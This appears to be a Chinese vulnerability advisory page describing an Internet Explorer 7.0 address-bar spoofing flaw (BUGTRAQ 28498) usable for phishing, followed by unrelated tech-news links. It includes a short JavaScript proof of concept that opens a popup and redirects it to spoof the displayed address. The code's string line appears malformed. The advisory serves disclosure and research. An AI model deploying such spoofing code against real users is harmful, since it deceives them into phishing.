受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微软发布的非常流行的WEB浏览器。如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
受影响系统:
  Microsoft Internet Explorer 7.0   描述:   BUGTRAQ ID: 28498   Internet Explorer是微软发布的非常流行的WEB浏览器。   如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。   <*来源:Juan Pablo Lopez Yacubian ([email protected])   链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">
function iniciar()
{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }
iniciar()
</script>

  建议:   目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   http://www.microsoft.com/windows/ie/default.asp

最新资讯
马斯克斥资1000万美元 购入特斯拉1.3万股股票

马斯克斥资1000万美元

特斯拉提交给美国证券交易委员会(SEC)的文件显示, 公司CE
Lyft将在纽约投放共享电单车 更换了电池和刹车装置

Lyft将在纽约投放共享

2月19日,美国第二大网约车公司Lyft宣布将在美国纽约市
完美世界:2019年营业收入80.38亿元 同比增长0.05%

完美世界:2019年营业

完美世界公布截至2019年12月31日止全年业绩快报:期内实
华为:未来5年将投资2000万美元 支持5G创新应用

华为:未来5年将投资200

丁耘宣布启动“5G合作伙伴创新计划”,并与行业合作伙伴
特斯拉旗下公司发生工商变更 注册资本增加50万美元

特斯拉旗下公司发生工

2月18日,特斯拉建设(上海)有限公司出现工商变更,David Jon
华为:已获得91个5G商用合同 5G基站发货超60万

华为:已获得91个5G商用

华为常务董事、运营商BG总裁丁耘刚刚在伦敦表示,截至目
最新文章
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番

CPU幽灵和熔断漏洞是

不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、M
解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

解析文件上传漏洞 从F

大部分的用户可能不要了解文件上传漏洞,下面小编就为大
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)

手把手教你如何构造Of

近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击
漏洞 自动化脚本 论漏洞和自动化脚本的区别

漏洞 自动化脚本 论漏

漏洞无处不在,它是在硬件、软件、协议的具体实现或系统
Python 爬虫修养-处理动态网页

Python 爬虫修养-处理

在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制
黑客通过Paypal可传输恶意图像

黑客通过Paypal可传输

PayPal解决了一个可被黑客用来向支付页面插入恶意图像